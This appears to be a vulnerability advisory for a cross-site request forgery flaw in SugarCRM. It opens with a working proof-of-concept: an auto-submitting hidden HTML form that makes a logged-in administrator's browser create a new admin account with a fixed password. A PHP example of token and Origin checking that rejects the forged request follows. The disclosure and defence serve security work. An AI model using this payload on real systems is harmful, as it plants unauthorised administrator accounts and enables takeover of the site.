PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>
John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.
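A server-side guard that would reject the forged request above, as an added example (not code from the original post or from SugarCRM). The function names, the `csrf_token` field and session key, and the `other-site.example` origin are assumptions; the site origin is the host from the PoC's form action.

```php
<?php
// Added example; every function, field and session-key name is hypothetical.
/** Issue (once per session) the token the genuine edit form must embed. */
function csrf_issue_token(array &$session): string
{
    $session['csrf_token'] ??= bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/** Reduce a URL to scheme://host[:port]; null for "null" or malformed input. */
function origin_of(string $url): ?string
{
    $p = parse_url($url);
    if (!is_array($p) || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host']);
    return isset($p['port']) ? $origin . ':' . $p['port'] : $origin;
}

/** Decide whether a request may change state for the session's user. */
function csrf_request_allowed(array $server, array $post, array $session, string $site): bool
{
    if (in_array($server['REQUEST_METHOD'] ?? 'GET', ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods; handlers must not change state on them
    }
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source !== null && origin_of($source) !== $site) {
        return false; // the browser reports a form hosted on another site
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($supplied) && hash_equals($expected, $supplied);
}

// Constructed requests: the PoC's key fields, sent with and without the token.
$session = [];                   // the logged-in administrator's session
$token   = csrf_issue_token($session);
$site    = 'http://192.168.1.4'; // origin of the PoC's form action
$fields  = ['module' => 'Users', 'action' => 'Save', 'is_admin' => '1', 'sugar_user_name' => 'new_admin'];
$cases = [
    'forged, cross-site' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other-site.example'], $fields],
    'forged, no Origin'  => [['REQUEST_METHOD' => 'POST'], $fields],
    'genuine edit form'  => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site], $fields + ['csrf_token' => $token]],
];
foreach ($cases as $name => [$server, $post]) {
    printf("%-20s %s\n", $name, csrf_request_allowed($server, $post, $session, $site) ? 'accepted' : 'rejected');
}
```

The Origin/Referer comparison is a second layer only: the request that arrives without either header is stopped by the token check, because every field in the PoC is a static value that an outside page can supply and the per-session token is not.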